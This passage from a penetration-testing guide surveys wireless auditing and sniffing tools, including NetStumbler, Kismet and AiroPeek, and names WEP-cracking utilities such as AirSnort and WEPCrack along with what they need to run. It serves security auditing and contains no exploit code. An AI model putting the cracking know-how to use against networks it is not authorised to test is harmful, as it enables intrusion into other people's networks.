Tools

You can use several tools when performing penetration tests against wireless networks. This section covers the following tools:

• NetStumbler

• StumbVerter

• DStumbler

• Kismet

• GPSMap

• AiroPeek NX

• AirSnort

• WEPCrack

NetStumbler

NetStumbler (http://stumbler.net) is probably the most widely used wireless auditing tool by penetration testers and malicious hackers alike. NetStumbler runs on Windows and detects with 802.11a, 802.11b, and 802.11g networks.

NetStumbler detects wireless networks and shows their signal strength and whether encryption is being used. This is helpful in discovering wireless networks for further penetration testing, detecting overlapping wireless networks from surrounding companies, and detecting unauthorized rogue APs in your organization. Figure 11-1 shows NetStumbler having detected two wireless SSIDs.

Figure 11-1. NetStumbler

NetStumbler is an active beacon scanner. It actively sends connection requests to all listening APs, even if they are not broadcasting their SSID. Access points subsequently respond to the requests with their SSID.

StumbVerter

StumbVerter (http://www.sonar-security.com) works in conjunction with NetStumbler and Microsoft MapPoint to provide a map of discovered wireless networks. StumbVerter imports the summary files of NetStumbler into Microsoft MapPoint 2004 and creates icons on a map of all discovered APs. This utility is helpful in pinpointing unauthorized rogue APs on your network.

DStumbler

DStumbler (http://www.dachb0den.com) is similar to NetStumbler except that it runs on BSD platforms. It has many of the same options as NetStumbler including GPS support, colored graphs, maximum supported rate detection, and beaconing interval.

Although DStumbler is a graphical program like NetStumbler, it does offer several command-line options:

usage: dstumbler device [-d] [-osn] [-m int] [-g gps device] [-l logfile] -d: run dstumbler without specifying a wireless device -o: specify the use of a prism2 card in monitor mode -s: disable scan mode on the card, instead do old style stat polling -n: use basic ascii characters for limited terminal fonts -m: randomly set mac address at specified interval or 0 for startup -g: specify gps device to use -l: specify logfile to use for realtime logging

Kismet

Kismet (http://www.kismetwireless.net) is a Linux and BSD-based 802.11b wireless sniffer that has the capability to separate sniffed traffic by wireless SSID.

Kismet requires an 802.11b wireless adapter that is capable of entering into RF monitoring mode. After the wireless adapter is in RF monitoring mode, it cannot associate itself with a wireless network. Therefore, when Kismet is running, you do not have access to the wireless network for other purposes and can only detect and sniff traffic on wireless networks.

Unlike NetStumbler, Kismet is a passive scanner. This means it does not actively probe for networks but instead listens passively for wireless traffic to discover SSIDs. If the wireless network has no traffic, Kismet does not detect its presence.

Figure 11-2 shows a screenshot of Kismet.

Figure 11-2. Kismet

GPSMap

GPSMap is a free program included with Kismet that maps out all APs discovered by Kismet and their respective ranges. By graphing out the ranges of an AP, you can often detect which wireless networks are home-based networks, which often have short ranges, and which are used by organizations, which often have longer ranges.

AiroPeek NX

AiroPeek NX (http://www.wildpackets.com/products/airopeek_nx) is a commercial wireless LAN analysis tool that runs on Windows platforms. AiroPeek captures traffic and provides analysis reports on your wireless LAN. Like NetStumbler, AiroPeek discovers wireless SSIDs, their channel number, the MAC address of the AP, and whether encryption is being used. AiroPeek goes beyond NetStumbler, however, in its capability to capture traffic and, using its Peer Map view, graphs out the amount and type of traffic present on a wireless network.

AiroPeek NX is an excellent solution for penetration testers because of its security audit features. It allows you to define a template to look for certain criteria, such as unauthorized protocols or rogue APs, during a security audit. It is also popular among penetration testers for its reporting features that are not typically found among non-commercial open-source equivalents.

AirSnort

As discussed earlier, many companies seek to secure their wireless networks through the use of WEP. However, WEP uses a weak initial vector (IV) in its algorithm and is easily cracked after enough packets have been gathered.

AirSnort (http://airsnort.shmoo.com) is a Linux utility that can crack WEP keys. This tool requires your wireless adapter to be in RF monitoring mode. It passively captures packets and then attempts to crack the encryption key. With 5 to 10 million packets captured, AirSnort can usually crack the WEP password in less than a second.

WEPCrack

WEPCrack (http://wepcrack.sourceforge.net) is similar to AirSnort in that it cracks WEP keys. WEPCrack has been around longer than AirSnort but is not as popular. WEPCrack is a Perl-based cracking program that requires a wireless adapter with the Prism chipset.